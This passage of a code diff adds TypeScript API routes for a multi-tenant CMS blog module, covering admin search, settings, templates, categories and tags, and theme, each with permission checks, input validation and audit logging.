+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import { searchBlogContentAdmin } from "../../../../../modules/blog-content/application/blog-search";
+import { isBlogContentStatus } from "../../../../../modules/blog-content/domain/post-status";
+import { decodeKeysetCursor } from "../../../../../modules/_shared/keyset-pagination";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "search",
+  action: "read" as const
+};
+
+/**
+ * `GET /api/v1/blog/search` (Issue #539) — admin full-text search across
+ * posts and pages, guarded by `blog_content.search.read`. May return
+ * content of any status (doc issue #539: "Admin search may include
+ * draft/review/scheduled/published/archived content according to
+ * permission" — the single `search.read` permission gates that, no
+ * further per-status composition). Keyset-paginated
+ * (`_shared/keyset-pagination.ts`, same `(created_at, id)` convention
+ * `GET /api/v1/logs/audit` uses).
+ */
+export const GET: APIRoute = async ({ request, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const query = url.searchParams.get("q");
+
+  if (!query || query.trim().length === 0) {
+    return fail(400, "VALIDATION_ERROR", "q is required.");
+  }
+
+  const resourceTypeParam = url.searchParams.get("type");
+  if (
+    resourceTypeParam !== null &&
+    resourceTypeParam !== "post" &&
+    resourceTypeParam !== "page"
+  ) {
+    return fail(400, "VALIDATION_ERROR", "type must be one of post, page.");
+  }
+
+  const statusParam = url.searchParams.get("status");
+  if (statusParam !== null && !isBlogContentStatus(statusParam)) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "status must be one of draft, review, scheduled, published, archived."
+    );
+  }
+
+  const cursorParam = url.searchParams.get("cursor");
+  const cursor = cursorParam ? decodeKeysetCursor(cursorParam) : null;
+
+  if (cursorParam && !cursor) {
+    return fail(400, "VALIDATION_ERROR", "cursor is malformed.");
+  }
+
+  const limitParam = url.searchParams.get("limit");
+  const limit = limitParam ? Number(limitParam) : undefined;
+
+  if (
+    limitParam !== null &&
+    (!Number.isFinite(limit) || (limit as number) < 1)
+  ) {
+    return fail(400, "VALIDATION_ERROR", "limit must be a positive number.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(
+    sql,
+    tenantId,
+    async (tx) => {
+      const auth = await authorizeInTransaction(
+        tx,
+        tenantId,
+        tokenHash,
+        now,
+        READ_GUARD
+      );
+
+      if (!auth.allowed) {
+        return auth.denied;
+      }
+
+      const result = await searchBlogContentAdmin(tx, tenantId, {
+        query: query.trim(),
+        resourceType: resourceTypeParam ?? undefined,
+        status: statusParam ?? undefined,
+        cursor: cursor ?? undefined,
+        limit
+      });
+
+      return ok(result);
+    },
+    { workClass: "reporting" }
+  );
+};

--- a/src/pages/api/v1/blog/settings/index.ts
+++ b/src/pages/api/v1/blog/settings/index.ts
@@ -1,0 +1,140 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchBlogSettings,
+  upsertBlogSettings
+} from "../../../../../modules/blog-content/application/blog-settings-directory";
+import { validateUpdateBlogSettingsInput } from "../../../../../modules/blog-content/domain/blog-settings-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "settings",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "settings",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/settings` (Issue #543) — this tenant's blog settings, falling back to schema/domain defaults when never configured. Permission `blog_content.settings.read` was seeded by migration 027 (Issue #537) but had no route consuming it until now. */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const settings = await fetchBlogSettings(tx, tenantId);
+
+    return ok(settings);
+  });
+};
+
+/** `PATCH /api/v1/blog/settings` (Issue #543) — partial-update upsert, no `id` param (one row per tenant, same convention `PATCH /api/v1/blog/theme` uses). Publishes `blog-content.settings.updated`, closing the gap the Issue #541 AsyncAPI channel left reserved-but-producer-less. */
+export const PATCH: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateBlogSettingsInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog settings are invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const settings = await upsertBlogSettings(tx, tenantId, input);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.settings.updated",
+      resourceType: "blog_settings",
+      severity: "info",
+      message: "Blog settings updated.",
+      correlationId
+    });
+
+    log("info", "blog-content.settings.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content"
+    });
+
+    return ok(settings);
+  });
+};

--- a/src/pages/api/v1/blog/templates/[id].ts
+++ b/src/pages/api/v1/blog/templates/[id].ts
@@ -1,0 +1,210 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchTemplateById,
+  softDeleteTemplate,
+  updateTemplate
+} from "../../../../../modules/blog-content/application/template-directory";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+import { validateUpdateTemplateInput } from "../../../../../modules/blog-content/domain/template-policy";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "templates",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/blog/templates/{id}` (Issue #542). */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Template id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateTemplateInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Template update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const updated = await updateTemplate(tx, tenantId, id, input);
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Template not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.template.updated",
+      resourceType: "blog_template",
+      resourceId: id,
+      severity: "info",
+      message: `Blog template updated: ${updated.key}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.template.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      templateId: id,
+      key: updated.key
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/blog/templates/{id}` (Issue #542) — soft-delete. `reason` required, same convention as posts/pages/terms. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Template id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchTemplateById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Template not found.");
+    }
+
+    await softDeleteTemplate(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      id,
+      reason
+    );
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.template.deleted",
+      resourceType: "blog_template",
+      resourceId: id,
+      severity: "warning",
+      message: "Blog template deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "blog-content.template.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      templateId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/templates/index.ts
+++ b/src/pages/api/v1/blog/templates/index.ts
@@ -1,0 +1,159 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createTemplate,
+  listTemplates
+} from "../../../../../modules/blog-content/application/template-directory";
+import { validateCreateTemplateInput } from "../../../../../modules/blog-content/domain/template-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "templates",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "templates",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/templates` (Issue #542) — list this tenant's non-deleted presentation templates. */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const templates = await listTemplates(tx, tenantId);
+
+    return ok({ templates });
+  });
+};
+
+/** `POST /api/v1/blog/templates` (Issue #542) — create a template. Not idempotent — a retry duplicating a create is caught by the `(tenant_id, key)` partial unique index. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request, "large");
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateTemplateInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Template is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    let template;
+
+    try {
+      template = await createTemplate(tx, tenantId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_templates_key_dedup")) {
+        return fail(
+          409,
+          "KEY_CONFLICT",
+          `A template already exists for key "${input.key}".`
+        );
+      }
+
+      throw error;
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.template.created",
+      resourceType: "blog_template",
+      resourceId: template.id,
+      severity: "info",
+      message: `Blog template created: ${template.key}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.template.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      templateId: template.id,
+      key: template.key
+    });
+
+    return ok(template);
+  });
+};

--- a/src/pages/api/v1/blog/terms/[id].ts
+++ b/src/pages/api/v1/blog/terms/[id].ts
@@ -1,0 +1,270 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchBlogTermById,
+  softDeleteBlogTerm,
+  updateBlogTerm
+} from "../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import {
+  validateSoftDeleteBlogTermInput,
+  validateUpdateBlogTermInput
+} from "../../../../../modules/blog-content/domain/blog-term-validation";
+import { validateTermParent } from "../../../../../modules/blog-content/domain/taxonomy-policy";
+
+const UPDATE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "taxonomies",
+  action: "configure" as const
+};
+
+const DELETE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "taxonomies",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/blog/terms/{id}` (Issue #539). No dedicated `GET /{id}` route (doc issue #539's Routes section lists list/create/update/delete only). Re-derives the effective `taxonomyType`/`parentId` against the existing row before writing, so `validateTermParent`'s ownership rule is checked against the real post-update state, not just the fields present in this one request body. */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const termId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!termId) {
+    return fail(400, "VALIDATION_ERROR", "Term id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateUpdateBlogTermInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog term update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      UPDATE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchBlogTermById(tx, tenantId, termId);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog term not found.");
+    }
+
+    const effectiveTaxonomyType = input.taxonomyType ?? existing.taxonomyType;
+    const effectiveParentId =
+      input.parentId !== undefined ? input.parentId : existing.parentId;
+    const ownershipResult = validateTermParent(
+      effectiveTaxonomyType,
+      termId,
+      effectiveParentId
+    );
+
+    if (!ownershipResult.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Blog term update is invalid.",
+        {},
+        ownershipResult.errors
+      );
+    }
+
+    if (effectiveParentId) {
+      const parentRows = await tx`
+        SELECT id FROM awcms_blog_terms
+        WHERE tenant_id = ${tenantId} AND id = ${effectiveParentId} AND deleted_at IS NULL
+      `;
+
+      if (parentRows.length === 0) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "parentId does not reference an existing term."
+        );
+      }
+    }
+
+    let updated;
+
+    try {
+      updated = await updateBlogTerm(tx, tenantId, termId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_terms_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A term already exists for slug "${input.slug}" in this taxonomy type.`
+        );
+      }
+
+      if (message.includes("awcms_blog_terms_tag_no_parent_check")) {
+        return fail(400, "VALIDATION_ERROR", "A tag must not have a parentId.");
+      }
+
+      throw error;
+    }
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog term not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.term.updated",
+      resourceType: "blog_term",
+      resourceId: termId,
+      severity: "info",
+      message: `Blog term updated: ${updated.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.term.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      termId,
+      slug: updated.slug
+    });
+
+    return ok(updated);
+  });
+};
+
+/** `DELETE /api/v1/blog/terms/{id}` (Issue #539) — soft-delete. `reason` required, same convention as posts/pages. No restore/purge endpoint exists for terms (doc issue #537's permission seed has no `taxonomies.restore`/`.purge`). */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const termId = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!termId) {
+    return fail(400, "VALIDATION_ERROR", "Term id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateSoftDeleteBlogTermInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      DELETE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const deleted = await softDeleteBlogTerm(
+      tx,
+      tenantId,
+      auth.context.tenantUserId,
+      termId,
+      reason
+    );
+
+    if (!deleted) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Blog term not found.");
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.term.deleted",
+      resourceType: "blog_term",
+      resourceId: termId,
+      severity: "warning",
+      message: "Blog term deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    return ok({ id: termId, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/terms/index.ts
+++ b/src/pages/api/v1/blog/terms/index.ts
@@ -1,0 +1,191 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createBlogTerm,
+  listBlogTerms
+} from "../../../../../modules/blog-content/application/blog-taxonomy-directory";
+import { validateCreateBlogTermInput } from "../../../../../modules/blog-content/domain/blog-term-validation";
+import { isTaxonomyType } from "../../../../../modules/blog-content/domain/taxonomy-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "taxonomies",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "taxonomies",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/terms` (Issue #539) — list this tenant's non-deleted categories/tags, `?taxonomyType=` optional filter. */
+export const GET: APIRoute = async ({ request, cookies, url }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const taxonomyTypeParam = url.searchParams.get("taxonomyType");
+
+  if (taxonomyTypeParam !== null && !isTaxonomyType(taxonomyTypeParam)) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "taxonomyType must be one of category, tag."
+    );
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const terms = await listBlogTerms(tx, tenantId, {
+      taxonomyType: taxonomyTypeParam ?? undefined
+    });
+
+    return ok({ terms });
+  });
+};
+
+/** `POST /api/v1/blog/terms` (Issue #539) — create a category or tag. Not idempotent — a retry duplicating a create is caught by the `(tenant_id, taxonomy_type, slug)` partial unique index. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateCreateBlogTermInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Blog term is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    if (input.parentId) {
+      const parentRows = await tx`
+        SELECT taxonomy_type FROM awcms_blog_terms
+        WHERE tenant_id = ${tenantId} AND id = ${input.parentId} AND deleted_at IS NULL
+      `;
+
+      if (parentRows.length === 0) {
+        return fail(
+          400,
+          "VALIDATION_ERROR",
+          "parentId does not reference an existing term."
+        );
+      }
+    }
+
+    let term;
+
+    try {
+      term = await createBlogTerm(tx, tenantId, input);
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+
+      if (message.includes("awcms_blog_terms_slug_dedup")) {
+        return fail(
+          409,
+          "SLUG_CONFLICT",
+          `A ${input.taxonomyType} already exists for slug "${input.slug}".`
+        );
+      }
+
+      if (message.includes("awcms_blog_terms_tag_no_parent_check")) {
+        return fail(400, "VALIDATION_ERROR", "A tag must not have a parentId.");
+      }
+
+      throw error;
+    }
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.term.created",
+      resourceType: "blog_term",
+      resourceId: term.id,
+      severity: "info",
+      message: `Blog term created: ${term.slug}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.term.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      termId: term.id,
+      slug: term.slug
+    });
+
+    return ok(term);
+  });
+};

--- a/src/pages/api/v1/blog/theme/index.ts
+++ b/src/pages/api/v1/blog/theme/index.ts
@@ -1,0 +1,141 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchBlogThemeSettings,
+  upsertBlogThemeSettings
+} from "../../../../../modules/blog-content/application/theme-settings-directory";
+import { validateUpdateThemeSettingsInput } from "../../../../../modules/blog-content/domain/theme-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "theme",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "theme",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/theme` (Issue #542) — this tenant's blog theme mode, falling back to `awcms_tenants.default_theme` when no override row exists (`isOverride: false`). */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const settings = await fetchBlogThemeSettings(tx, tenantId);
+
+    return ok(settings);
+  });
+};
+
+/** `PATCH /api/v1/blog/theme` (Issue #542) — set (or overwrite) this tenant's blog theme override. Upsert, no `id` param — one row per tenant. */
+export const PATCH: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
